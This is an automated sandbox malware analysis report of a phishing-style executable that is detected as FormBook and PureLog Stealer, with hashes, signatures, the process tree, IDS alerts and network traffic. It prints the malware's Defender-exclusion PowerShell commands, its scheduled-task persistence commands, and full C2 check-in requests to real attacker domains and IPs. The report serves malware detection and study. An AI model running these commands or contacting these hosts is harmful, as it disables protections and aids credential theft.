Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pre Alert PO TVKJEANSA00967.bat.exe

Overview

General Information

Sample name:Pre Alert PO TVKJEANSA00967.bat.exe
Analysis ID:1563935
MD5:574c0e8c1d426321e95bd8476334f271
SHA1:0b43d8c96bbece4a501991ad1a0761a4710176c5
SHA256:7e1c2d14ebc29ae8d1434d9d18d6054a16e91385051d7bb9ed183a63fafa66b8
Tags:batexeuser-abuse_ch
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Pre Alert PO TVKJEANSA00967.bat.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe" MD5: 574C0E8C1D426321E95BD8476334F271)
    • powershell.exe (PID: 7748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8084 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7848 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • nhClcdOjQwJ.exe (PID: 2484 cmdline: "C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 2992 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • nhClcdOjQwJ.exe (PID: 5608 cmdline: "C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • STiokuWkiGFJ.exe (PID: 8064 cmdline: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe MD5: 574C0E8C1D426321E95BD8476334F271)
    • schtasks.exe (PID: 2676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ProcessId: 7748, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ProcessId: 7748, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe, ParentImage: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe, ParentProcessId: 8064, ParentProcessName: STiokuWkiGFJ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp", ProcessId: 2676, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", ProcessId: 7848, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ProcessId: 7748, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe", ParentImage: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe, ParentProcessId: 7480, ParentProcessName: Pre Alert PO TVKJEANSA00967.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp", ProcessId: 7848, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T16:43:19.387146+010020507451Malware Command and Control Activity Detected192.168.2.44974315.197.142.17380TCP
                      2024-11-27T16:43:44.696864+010020507451Malware Command and Control Activity Detected192.168.2.44978738.6.78.23580TCP
                      2024-11-27T16:44:00.225216+010020507451Malware Command and Control Activity Detected192.168.2.449826139.162.181.7680TCP
                      2024-11-27T16:44:16.039080+010020507451Malware Command and Control Activity Detected192.168.2.449860154.23.176.19780TCP
                      2024-11-27T16:44:31.286011+010020507451Malware Command and Control Activity Detected192.168.2.449898194.58.112.17480TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T16:43:19.387146+010028554651A Network Trojan was detected192.168.2.44974315.197.142.17380TCP
                      2024-11-27T16:43:44.696864+010028554651A Network Trojan was detected192.168.2.44978738.6.78.23580TCP
                      2024-11-27T16:44:00.225216+010028554651A Network Trojan was detected192.168.2.449826139.162.181.7680TCP
                      2024-11-27T16:44:16.039080+010028554651A Network Trojan was detected192.168.2.449860154.23.176.19780TCP
                      2024-11-27T16:44:31.286011+010028554651A Network Trojan was detected192.168.2.449898194.58.112.17480TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T16:43:36.752491+010028554641A Network Trojan was detected192.168.2.44976838.6.78.23580TCP
                      2024-11-27T16:43:39.370503+010028554641A Network Trojan was detected192.168.2.44977538.6.78.23580TCP
                      2024-11-27T16:43:42.095834+010028554641A Network Trojan was detected192.168.2.44978138.6.78.23580TCP
                      2024-11-27T16:43:51.963011+010028554641A Network Trojan was detected192.168.2.449803139.162.181.7680TCP
                      2024-11-27T16:43:54.656200+010028554641A Network Trojan was detected192.168.2.449810139.162.181.7680TCP
                      2024-11-27T16:43:57.614795+010028554641A Network Trojan was detected192.168.2.449817139.162.181.7680TCP
                      2024-11-27T16:44:07.849372+010028554641A Network Trojan was detected192.168.2.449841154.23.176.19780TCP
                      2024-11-27T16:44:10.536744+010028554641A Network Trojan was detected192.168.2.449847154.23.176.19780TCP
                      2024-11-27T16:44:13.209788+010028554641A Network Trojan was detected192.168.2.449853154.23.176.19780TCP
                      2024-11-27T16:44:23.316350+010028554641A Network Trojan was detected192.168.2.449878194.58.112.17480TCP
                      2024-11-27T16:44:25.958240+010028554641A Network Trojan was detected192.168.2.449884194.58.112.17480TCP
                      2024-11-27T16:44:28.724138+010028554641A Network Trojan was detected192.168.2.449891194.58.112.17480TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeReversingLabs: Detection: 55%
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeReversingLabs: Detection: 55%
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeJoe Sandbox ML: detected
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeJoe Sandbox ML: detected
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nhClcdOjQwJ.exe, 00000011.00000000.1994231473.000000000004E000.00000002.00000001.01000000.0000000D.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2941482691.000000000004E000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: QIoK.pdb source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: RegSvcs.pdb source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: QIoK.pdbSHA256 source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: runas.pdb source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0050C8A0 FindFirstFileW,FindNextFileW,FindClose,18_2_0050C8A0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 4x nop then xor eax, eax18_2_004F9DE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 4x nop then mov ebx, 00000004h18_2_043004DE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 38.6.78.235:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 38.6.78.235:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49787 -> 38.6.78.235:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49787 -> 38.6.78.235:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 38.6.78.235:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49743 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 139.162.181.76:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49826 -> 139.162.181.76:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49826 -> 139.162.181.76:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 139.162.181.76:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 139.162.181.76:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 154.23.176.197:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49847 -> 154.23.176.197:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 154.23.176.197:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49860 -> 154.23.176.197:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49860 -> 154.23.176.197:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49878 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49898 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49898 -> 194.58.112.174:80
                      Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
                      Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
                      Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
                      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                      Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.dojodigitize.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                      Source: global trafficHTTP traffic detected: GET /yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.17jkgl.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                      Source: global trafficHTTP traffic detected: GET /d43q/?fvqp6=9vfXK&LRW=qOy9fp5Cl0yUgYAEczO7dyJ+bxzOsQOuCHBFuR5y1LF4o9syCZkEzLGi7aZXV+ZbwDd0E0+zyiVRHPLTItQK1mi6x0nkeaPePZztRgCxUMm7wu9eAI3Dzhs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.alvinsd.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                      Source: global trafficHTTP traffic detected: GET /b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.shipincheshi.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
